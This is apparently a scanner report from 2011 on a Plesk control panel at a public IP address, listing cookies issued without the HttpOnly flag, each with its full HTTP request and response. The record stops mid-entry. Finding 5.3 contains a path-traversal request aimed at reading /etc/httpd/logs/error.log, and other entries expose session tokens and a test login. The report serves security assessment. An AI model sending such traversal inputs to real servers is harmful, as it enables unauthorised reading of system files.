5.1. https://50.22.21.242:8443/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://50.22.21.242:8443
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 20:32:39 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=565389ef1fcc3f50f25b02dfc435c66b; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 20:32:39 GMT
Content-Length: 1216


       <html><head>
       <meta charset="utf-8">
       <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
       <title></title>
       <script src="/javascript/common.js?plesk_version=psa-10.4.4-20111103.
...[SNIP]...

5.2. https://50.22.21.242:8443/admin/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://50.22.21.242:8443
Path:   /admin/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/ HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Host: 50.22.21.242:8443
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:32:18 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=bc2a45d07f17db0216ec73bb0fbae143; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:32:18 GMT
Content-Length: 1216


       <html><head>
       <meta charset="utf-8">
       <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
       <title></title>
       <script src="/javascript/common.js?plesk_version=psa-10.4.4-20111103.
...[SNIP]...

5.3. https://50.22.21.242:8443/help.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://50.22.21.242:8443
Path:   /help.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help.php?context=../../../../../../../../../../etc/httpd/logs/error.log HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 04:52:17 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=05f76d98be673cb6f1e57430536e3b51; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 04:52:17 GMT
Content-Length: 8450

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.4. https://50.22.21.242:8443/login_up.php3  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://50.22.21.242:8443
Path:   /login_up.php3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /login_up.php3 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/login_up.php3
Cookie: PLESKSESSID=565389ef1fcc3f50f25b02dfc435c66b
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

login_name=xssme%40z.xss.cx&passwd=omgitsthepasswd&locale_id=default&send=

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 20:33:21 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Plesk: PSA-Key/PLSK016937440000
Set-Cookie: PLESKSESSID=39139572be0e1777a54c9a9ae93f2e91; path=/
Set-Cookie: PLESKSESSID=39139572be0e1777a54c9a9ae93f2e91; path=/; secure; httponly
Set-Cookie: locale=en-US; expires=Sun, 18-Nov-2012 20:33:21 GMT; path=/
Set-Cookie: no_frames=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: no_frames_root_page=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: no_frames_login_page=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: no_frames_logout_page=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 20:33:21 GMT
Content-Length: 1186


       <html><head>
       <meta charset="utf-8">
       <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
       <title></title>
       <script src="/javascript/common.js?plesk_version=psa-10.4.4-20111103.
...[SNIP]...

5.5. https://50.22.21.242:8443/smb/admin-home/installed-applications/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://50.22.21.242:8443
Path:   /smb/admin-home/installed-applications/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /smb/admin-home/installed-applications/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Referer: https://50.22.21.242:8443/smb/admin-home
Cookie: locale=en-US

Response

HTTP/1.1 400 Bad Request
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 04:51:59 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=1e4e2ebab0cb833dd91dd94df059bc05; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 04:51:59 GMT
Content-Length: 0


5.6. https://50.22.21.242:8447/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://50.22.21.242:8447
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: 50.22.21.242:8447
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; psaContext=personal-info; locale=en-US

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sessionID=butgahwixmhfgewbapllmakz


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="con
...[SNIP]...

5.7. https://50.22.21.242:8447/add_components.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://50.22.21.242:8447
Path:   /add_components.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /add_components.html HTTP/1.1
Host: 50.22.21.242:8447
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; psaContext=personal-info

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sessionID=jjoorlkdrukdxfylzvqpaafj


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="con
...[SNIP]...

5.8. https://50.22.21.242:8447/preferences.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://50.22.21.242:8447
Path:   /preferences.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /preferences.html HTTP/1.1
Host: 50.22.21.242:8447
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8447/summary.html
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=xvrjftqfoptegfsokqpykqdf
Cache-Control: max-age=0

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sessionID=xvrjftqfoptegfsokqpykqdf


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="con
...[SNIP]...

5.9. https://50.22.21.242:8447/select_components.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://50.22.21.242:8447
Path:   /select_components.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /select_components.html HTTP/1.1
Host: 50.22.21.242:8447
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8447/update_components.html?secret=kuhuxksjhcxnhtyhhxea&locale=en-US
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; psaContext=personal-info; sessionID=jjoorlkdrukdxfylzvqpaafj

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sessionID=jjoorlkdrukdxfylzvqpaafj


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="con
...[SNIP]...

5.10. https://50.22.21.242:8447/summary.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://50.22.21.242:8447
Path:   /summary.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /summary.html HTTP/1.1
Host: 50.22.21.242:8447
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; psaContext=personal-info; locale=en-US; sessionID=butgahwixmhfgewbapllmakz

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sessionID=lktjdvrcmsjeenlsehgglimo


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="con
...[SNIP]...

5.11. https://50.22.21.242:8447/update_components.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://50.22.21.242:8447
Path:   /update_components.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /update_components.html HTTP/1.1
Host: 50.22.21.242:8447
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; psaContext=personal-info

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sessionID=brgsejtikfnhxaydtukmydma


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="con
...[SNIP]...

5.12. https://50.22.21.242:8443/admin/app/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/app/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/app/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/smb/redirect/pleskin/root/?dst=%2Fadmin%2Fapp%2F&src=%2Fsmb%2Fsettings%2Ftools&srcController=SettingsController
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=xvrjftqfoptegfsokqpykqdf; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 13:37:58 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=health; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 13:37:59 GMT
Connection: close
Content-Length: 9719

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.13. https://50.22.21.242:8443/admin/app/usage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/app/usage

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/app/usage HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/settings/tools
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:03:34 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=tools; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:03:33 GMT
Content-Length: 18267

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.14. https://50.22.21.242:8443/admin/customer-service-plan/list/reset-search/true/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/customer-service-plan/list/reset-search/true/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer-service-plan/list/reset-search/true/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/admin/home/admin
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; sessionID=ouhymmzgtdaqakoglnanbrbl; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; PLESKSESSID=b7d5dd4b3a9bb447376c29193bcc7fd3; psaContext=home

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 06:49:21 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=service-plans; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 06:49:22 GMT
Connection: close
Content-Length: 13739

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.15. https://50.22.21.242:8443/admin/customer/create  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/customer/create

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/create HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/admin/customer/list?context=customers
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:40:23 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=customers; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:40:22 GMT
Content-Length: 46685

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.16. https://50.22.21.242:8443/admin/customer/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/customer/list

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/list?context=customers HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/admin/domain/list?context=domains
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=domains

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:40:17 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=customers; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:40:17 GMT
Content-Length: 17148

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.17. https://50.22.21.242:8443/admin/customer/overview/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/customer/overview/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/overview/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
